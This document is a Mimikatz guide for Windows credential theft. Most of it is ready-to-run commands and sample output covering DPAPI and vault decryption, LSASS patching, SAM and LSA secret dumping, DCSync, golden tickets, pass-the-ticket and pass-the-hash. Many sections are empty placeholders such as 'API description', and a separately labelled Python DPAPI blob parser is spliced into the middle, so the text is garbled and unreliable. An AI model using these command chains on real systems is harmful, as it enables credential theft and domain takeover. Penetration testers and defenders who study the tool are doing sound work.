Introduction

Mimikatz is a powerful post-exploitation tool authored by Benjamin DELPY. This guide presents its fundamental concepts, advanced usage, and real-world applications, helping cybersecurity professionals master credential extraction, memory manipulation, and privilege escalation on Windows systems.

The Standard Credential Extraction

The Standard Credential Extraction explanation

Basic Command Usage

To extract credentials using Mimikatz...

mimikatz # vault::cred

Example output:

[... content unchanged ...]

Explanation of Output

API description

Using Mimikatz to Extract Web Credentials

vault::list...

mimikatz # vault::list

Working with LSASS and DPAPI

LSASS description

Altering LSASS Logic

LSASS patch

mimikatz # sekurlsa::patch

Warning

Extracting Credentials with DPAPI

Intro

%appdata%\Microsoft\Credentials
%localappdata%\Microsoft\Credentials

Example Command

Command explanation

mimikatz # dpapi::cred /in:"%appdata%\Microsoft\Credentials\85E671988F9AD21981A4B6791F9A4EE8"

Output description

**BLOB**
dwVersion        : 00000001 - 1
guidProvider     : {df9d8c0d-15e1-11d1-8c7a-00c04fc297eb}
...
szDescription    : Données d’identification d’entreprise
...
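As an added example that is not part of the original guide: a Python parser that walks the DPAPI BLOB header fields shown above without decrypting anything, so an analyst can confirm a file really is a DPAPI blob and record which master key GUID it depends on. The sample blob is constructed inline; the field order follows the DPAPI blob layout, and the provider and master key GUIDs are the ones quoted on this page.

```python
import struct
import uuid

# Microsoft's DPAPI provider GUID, the guidProvider value in the listing above.
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8c0d-15e1-11d1-8c7a-00c04fc297eb")


def parse_dpapi_blob(blob):
    """Walk the DPAPI BLOB header and return its fields as a dict (no decryption)."""
    off = 0

    def take(n):  # slice n bytes, refusing to read past the end of the buffer
        nonlocal off
        if off + n > len(blob):
            raise ValueError("blob truncated at offset %d" % off)
        off += n
        return blob[off - n:off]

    def u32():
        return struct.unpack("<I", take(4))[0]

    version, provider = u32(), uuid.UUID(bytes_le=take(16))
    mk_version, mk_guid, flags = u32(), uuid.UUID(bytes_le=take(16)), u32()
    description = take(u32()).decode("utf-16-le").rstrip("\x00")
    alg_crypt, alg_crypt_len = u32(), u32()
    salt = take(u32())
    take(u32())                                   # pbHmackKey (legacy, usually empty)
    alg_hash, alg_hash_len = u32(), u32()
    take(u32())                                   # pbHmack2Key (usually empty)
    data = take(u32())                            # encrypted payload
    sign = take(u32())                            # HMAC over the blob
    return {"version": version, "provider": provider, "masterkey_guid": mk_guid,
            "masterkey_version": mk_version, "flags": flags, "description": description,
            "alg_crypt": alg_crypt, "alg_crypt_len": alg_crypt_len, "salt_len": len(salt),
            "alg_hash": alg_hash, "alg_hash_len": alg_hash_len,
            "data_len": len(data), "sign_len": len(sign), "trailing": len(blob) - off}


def build_sample_blob():
    """Constructed sample (not a real capture): header layout as above, filler payload."""
    def lv(b):  # length-prefixed field
        return struct.pack("<I", len(b)) + b
    mk_guid = uuid.UUID("cc6eb538-28f1-4ab4-adf2-f5594e88f0b2")  # master key GUID from the page
    return (struct.pack("<I", 1) + DPAPI_PROVIDER_GUID.bytes_le
            + struct.pack("<I", 1) + mk_guid.bytes_le + struct.pack("<I", 0)
            + lv("Enterprise Credential Data\x00".encode("utf-16-le"))
            + struct.pack("<II", 0x6610, 256) + lv(b"\x11" * 32)  # CALG_AES_256, salt
            + lv(b"")                                               # pbHmackKey
            + struct.pack("<II", 0x800E, 512) + lv(b"")             # CALG_SHA_512, pbHmack2Key
            + lv(b"\x22" * 48)                                      # filler ciphertext
            + lv(b"\x33" * 64))                                     # filler signature
```

A non-zero `trailing` count or a provider GUID other than the Microsoft one is a sign the file is not a plain DPAPI blob (credential files on disk carry a short wrapper before the blob).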

Decrypting the Blob

Blob explanation

Master Key Location

Key location

%appdata%\Microsoft\Protect\cc6eb538-28f1-4ab4-adf2-f5594e88f0b2

Extract key

mimikatz # dpapi::masterkey /in:"%appdata%\Microsoft\Protect\S-1-5-21-...\cc6eb538-28f1-4ab4-adf2-f5594e88f0b2"

Using RPC for Domain Controllers

RPC explanation

mimikatz # dpapi::masterkey /in:"..." /rpc

Final Decryption

Final decrypt

mimikatz # dpapi::cred /in:"%appdata%\Microsoft\Credentials\85E671988F9AD21981A4B6791F9A4EE8"

Decrypted output

**CREDENTIAL**
credFlags        : 00000030 = 48
credSize         : 0000008e = 142
...
UserName         : domusr
CredentialBlob   : dompass

Decrypt EFS Files

Decrypting Encrypted File System (EFS) files can be complex...

Decryption Steps

  1. Retrieve and export the certificate.
  2. Locate and export the key.
  3. Decrypt master key.
  4. Decrypt the private key.
  5. Access the file.

Prerequisites

  1. Encrypted files on system.
  2. d:\Users\<username>\AppData\Roaming\Microsoft
  3. The user's password, used to decrypt the master key, e.g. waza1234/

1. Get File Info

cipher command:

cipher /c "d:\Users\Gentil Kiwi\Documents\encrypted.txt"

2. Export the Certificate

mimikatz # crypto::system /file:"D:\Users\Gentil Kiwi\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\B53C6DE283..." /export

3. Locate Private Key

mimikatz # dpapi::capi /in:"D:\Users\Gentil Kiwi\AppData\Roaming\Microsoft\Crypto\RSA\...\filename"

4. Decrypt Master Key

mimikatz # dpapi::masterkey /in:"D:\...\Protect\...\eccbd2c2..." /password:waza1234/

5. Decrypt the Private Key

mimikatz # dpapi::capi /masterkey:7e86f2b799... /in:"D:\Users\Gentil Kiwi\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-...\filename"

6. Decrypt the EFS File

Scheduled Tasks Credentials

Step-by-Step Instructions

1. Vault Credentials Method

mimikatz # vault::cred

TargetName : LAB\admin / <NULL>
UserName   : LAB\admin
Type       : 1 - generic
Persist    : 3 - enterprise
Credential : waza1234/a

mimikatz # sekurlsa::credman

Authentication Id : 0 ; 183160 (00000000:0002cb78)
Session           : Interactive from 1
User Name         : Administrateur
Domain            : LAB
Logon Server      : DC-0
Logon Time        : 03/01/2017 22:27:52
SID               : S-1-5-21-...-500
    * Username : LAB\admin
    * Domain   : LAB\admin
    * Password : waza1234/a

2. Elevating to SYSTEM

mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # vault::cred

TargetName : Domain:batch=TaskScheduler:Task:{813565C4-C976-4E78-A1CA-8BD4E749E965} / <NULL>
UserName   : LAB\admin
Type       : 2 - domain_password
Persist    : 2 - local_machine
Flags      : 00000004
Credential : 
Attributes : 0

mimikatz # vault::cred /patch

TargetName : Domain:batch=TaskScheduler:Task:{813565C4-C976-4E78-A1CA-8BD4E749E965} / <NULL>
UserName   : LAB\admin
Credential : waza1234/a

3. DPAPI Method

%systemroot%\System32\config\systemprofile\AppData\Local\Microsoft\Credentials

C:\> dir /a %systemroot%\System32\config\systemprofile\AppData\Local\Microsoft\Credentials

mimikatz # dpapi::cred /in:"%systemroot%\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\AA10EB8126AA20B83E9542B120AF904C"

**CREDENTIAL**
credFlags       : 00000030 = 48
credSize        : 000000fe = 254
Type            : 00000002 - 2 - domain_password
UserName        : LAB\admin
CredentialBlob  : waza1234/a

4. Extracting DPAPI Master Keys

mimikatz # sekurlsa::dpapi

mimikatz # dpapi::cred /in:"%systemroot%\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\AA10EB8126AA20B83E9542B120AF904C" /masterkey:049e924fc93420ed6d1e3731c24fc9fcb6dcdd258ac2106dc426dec3adc1200ee7abdd56c68cd05185f02d39ac2b2ca5158534ea5c53c2d6e73bbce

**CREDENTIAL**
UserName        : LAB\admin
CredentialBlob  : waza1234/a

5. Offline Method

mimikatz # lsadump::secrets /system:c:\backup\SYSTEM /security:c:\backup\SECURITY

mimikatz # dpapi::masterkey /in:"%systemroot%\System32\Microsoft\Protect\S-1-5-18\User\5d4e7ed0-d922-4783-8efc-9319b45b1c9a" /system:c89e3964a40b5aa3b3993c8320822f857d9182c

mimikatz # dpapi::cred /in:"%systemroot%\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\AA10EB8126AA20B83E9542B120AF904C"

Crypto Module

It includes certutil-like functionality, token impersonation, patching APIs, and more.

Commands

providers

Usage

mimikatz # crypto::providers

Output Example

CryptoAPI providers :
 0. RSA_FULL (1) - Microsoft Base Cryptographic Provider v1.0
...
CNG providers :
 0. Microsoft Key Protection Provider
...

capi

Usage

mimikatz # crypto::capi

Output Example

Local CryptoAPI patched

cng

Usage

mimikatz # privilege::debug
mimikatz # crypto::cng

Output Example

"KeyIso" service patched

kerberos

Commands Overview

Command Details

ptt (Pass-The-Ticket)

Arguments:

mimikatz # kerberos::ptt Administrateur@krbtgt-CHOCOLATE.LOCAL.kirbi

golden / silver

Common Arguments

Key Arguments

Target & Service

Ticket Output

Lifetime Arguments

Example:

mimikatz # kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:318b643c5316c8c3c70a1c0ef17be231 /id:1107 /groups:513 /ticket:utilisateur.chocolate.kirbi

tgt

mimikatz # kerberos::tgt

list

mimikatz # kerberos::list /export

purge

mimikatz # kerberos::purge

lsadump

Commands

sam (Online Mode)

mimikatz # lsadump::sam

Elevating Privileges

mimikatz # privilege::debug
mimikatz # token::whoami
mimikatz # token::elevate

Running Again

mimikatz # lsadump::sam

Output

Domain : VM-W7-ULT-X
SysKey : 74c159e4488119a0ba39a7872e9d9a56
SAMKey : e44ddd44f07ebfe800edf6c11d4abd

RID : 000001f4 (500)
User : Administrateur
NTLM : 316dcf...c089c0
...

Offline Mode

reg save HKLM\SYSTEM SystemBkup.hiv
reg save HKLM\SAM SamBkup.hiv

Or:

mimikatz # lsadump::sam /system:SystemBkup.hiv /sam:SamBkup.hiv

secrets

mimikatz # lsadump::secrets

cache

mimikatz # lsadump::cache

lsa

mimikatz # lsadump::lsa /id:500

mimikatz # lsadump::lsa /inject /name:krbtgt

mimikatz # lsadump::lsa /patch

dcsync

mimikatz # lsadump::dcsync /domain:chocolate.local /user:Administrator

sekurlsa

Requirements

  1. privilege::debug (admin)
  2. SYSTEM via psexec, scheduled task, etc.

Initial Setup

mimikatz # privilege::debug
mimikatz # log sekurlsa.log

Commands and Usage

mimikatz # sekurlsa::logonpasswords

Example output:

Username : Gentil Kiwi
NTLM     : cc36cf7a8514893efccd332446158b1a
...
kerberos : Password : waza1234/
credman  : Password : anotherpassword

Pass-The-Hash

mimikatz # sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a

tickets

mimikatz # sekurlsa::tickets /export

ekeys

mimikatz # sekurlsa::ekeys

dpapi

mimikatz # sekurlsa::dpapi

minidump

mimikatz # sekurlsa::minidump lsass.dmp

mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonpasswords